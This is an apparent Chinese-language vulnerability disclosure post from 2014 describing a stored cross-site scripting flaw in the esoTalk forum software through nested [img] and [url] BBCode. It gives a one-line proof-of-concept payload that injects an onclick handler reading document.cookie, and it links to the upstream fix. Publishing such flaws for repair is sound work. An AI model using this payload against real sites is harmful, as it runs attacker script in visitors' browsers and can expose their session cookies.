Esotalk v1.0.0g4 [img] 所导致的存储型跨站漏洞

27 Dec 2014 - evi1m0

About

esoTalk是一款国外拥有众多优势的免费,开源的基于PHP和MySQL下的网页应用。 她的设计极为简介,速度极快,超轻量级别并且有良好的可拓展性。

Proof of Concept

这次与 http://1.hackersoul.sinaapp.com/post/ff0000-hsdb-0006.html 稍微有些不同的是,[img] 所导致的:

[img][url=http://onclick=alert(document.cookie)//.com]http://www.hackersoul.com/image.jpg[/url][/img]
Fix

https://github.com/esotalk/esoTalk/issues/401

http://ww1.sinaimg.cn/large/c334041bjw1eqyhs08k8fj20pi0bnjss.jpg

评论插件使用 Disqus ,需翻墙才能查看及留言。